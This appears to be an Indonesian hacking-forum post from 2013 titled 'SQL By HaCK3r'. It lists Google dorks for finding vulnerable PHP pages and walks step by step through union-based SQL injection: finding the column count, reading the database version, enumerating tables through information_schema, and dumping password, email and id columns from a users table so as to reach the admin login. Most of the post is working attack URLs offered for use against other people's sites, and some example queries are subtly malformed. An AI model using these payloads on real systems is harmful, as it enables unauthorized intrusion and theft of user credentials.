Pontianak Cyber Crime Community
KALI INI FORUM PC3 PINDAH KE : http://badsystem.us.to/index.php

Kali ini link yang admin bagikan sudah pasti, tidak akan ada pergantian domain lagi.

Terima Kasih

Pontianak Cyber Crime Community

Welcome to your Forum Pontianak Cyber Crime Community
 
IndeksPortalCalendarPencarianPendaftaranLogin

Share | 
 

 SQL By HaCK3r

Topik sebelumnya Topik selanjutnya Go down 
PengirimMessage
Admin
™-----Administrator-----™
™-----Administrator-----™
avatar

Jumlah posting : 50
Points : 163981
Join date : 27.01.13
Age : 19
Lokasi : Pontianak

PostSubyek: SQL By HaCK3r   Wed Jan 30, 2013 8:46 am

DORK : Klik SPOILER
Spoiler:
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=



CARA:

1.misal ketemu http://www.xxx.com/index.php?id=1
maka tambahkan ' di akhir kalimat sehingga menjadi http://www.xxx.com/index.php?id=1'
harus ada pesan/tulisan eror kalau tdk ada cari yg lain

2.mencari jumlah table dengan cara memakai order by contoh
http://www.xxx.com/index.php?id=-1 order by 1--
itu pakai spasi

jika
http://www.xxx.com/index.php?id=-1 order by 1-- tidak ada pesan eror sperti cara 1 maka tambah 1 pada angka terakhir misal
http://www.xxx.com/index.php?id=-1 order by 1-- di rubah jadi
http://www.xxx.com/index.php?id=-1 order by 2--
BEGITU TERUS SAMPAI SETERUSNYA SAMPAI ADA PESAN/TULISAN EROR
KALAU SUDAH KETEMU PADA EROR PERTAMA MISAL
http://www.xxx.com/index.php?id=-1 ORDER BY 9-- (EROR PERTAMA) maka jumlah table ada 8

3.kita sudah menemukan jumlah table yaitu 8 setelah itu kita memakai cara union select

misal http://www.xxx.com/index.php?id=1 di rubah menjadi http://www.xxx.com/index.php?id=-1 union select 1,2,3,4,5,6,7,8--
setelah itu maka akan muncul beberapa angka dan 1 angka ada yg pling besar(SIZE nya).jika huruf paling besar adalah 3 maka:

http://www.xxx.com/index.php?id=-1 union select 1,2,3,4,5,6,7,8-- di rubah menjadi http://www.xxx.com/index.php?id=-1 1,2,3,@@version,5,6,7,8--
maka akan muncul versi SQL nya,jika versinya 5 kita lanjut kalau versinya 4 harus pakai sql blind.
ini untuk versi 5:

http://www.xxx.com/index.php?id=-1 union select 1,2,3,group_concat(table_name),7,8 information_schema.tables where table_schema=database()

maka akan kluar beberapa tulisan.cari kata kata yg berhubungan dengan admin misalnya ada tulisan "admin" atau "users"
misal hanya ada tulisan "users"
maka buka http://www.swingnote.com/tools/texttohex.php lalu kita convert to hex yaitu kata "users" tdi menjadi kode hex yg hasilnya 7573657273

kita sudah ada kode 7573657273 yg artinya adalah "users"yg kata users itu dapetnya dari http://www.xxx.com/index.php?id=-1 union select 1,2,3,group_concat(table_name),7,8 information_schema.tables where table_schema=database()

setelah itu kita ubah http://www.xxx.com/index.php?id=-1 union select 1,2,3,group_concat(table_name),7,8 information_schema.tables where table_schema=database()

- table_name = column_name = group_concat(column_name)
- tables = columns = from information_schema.columns
- table_schema=database() =? table_name=0x(tambahkan kode hex tadi) = table_name=0x7573657273

Contoh: http://www.xxx.com/index.php?id=-1 union select 1,2,3,group_concat(table_name),7,8 from information_schema.columns where table_name=0x7573657273--

4.nah lalu ada kata kata misal password,email,id dll
kita pakai yg perlu saja.

misal dari
http://www.xxx.com/index.php?id=-1 union select 1,2,3,group_concat(table_name),7,8 from information_schema.columns where table_name=0x7573657273--

kita rubah
-(table_name) menjadi tulisan yg ada di cara sblumnya misal password,email,id dll TETAPI CARA PEMISAHANYA HARUS MEMAKAI KODE ,0x3a,

misal url kita tdi http://www.xxx.com/index.php?id=-1 union select 1,2,3,group_concat(table_name),7,8 from information_schema.columns where table_name=0x7573657273--

dirubah menjadi

http://www.xxx.com/index.php?id=-1 union select 1,2,3,group_concat(password,0x3a,email,0x3a,id),7,8 from information_schema.columns where table_name=0x7573657273--

dan kode terakhir kita ubah juga.kita di ataskan kode hexnya adalah "users" maka kita ganti pada url
http://www.xxx.com/index.php?id=-1 union select 1,2,3,group_concat(password,0x3a,email,0x3a,id),7,8 from information_schema.columns where table_name=0x7573657273--

menjadi

http://www.xxx.com/index.php?id=-1 union select 1,2,3,group_concat(password,0x3a,email,0x3a,id),7,8 from users--

SELESAI DEH SEKARANG TINGGAL CARI HALAMAN LOGIN ADMINYA

CARI DI MBAH GOOGLE YAH....
Kembali Ke Atas Go down
http://pontianakc3.net.my.id
 
SQL By HaCK3r
Topik sebelumnya Topik selanjutnya Kembali Ke Atas 
Halaman 1 dari 1

Permissions in this forum:Anda tidak dapat menjawab topik
Pontianak Cyber Crime Community :: Trash Can :: Trash Can-
Navigasi: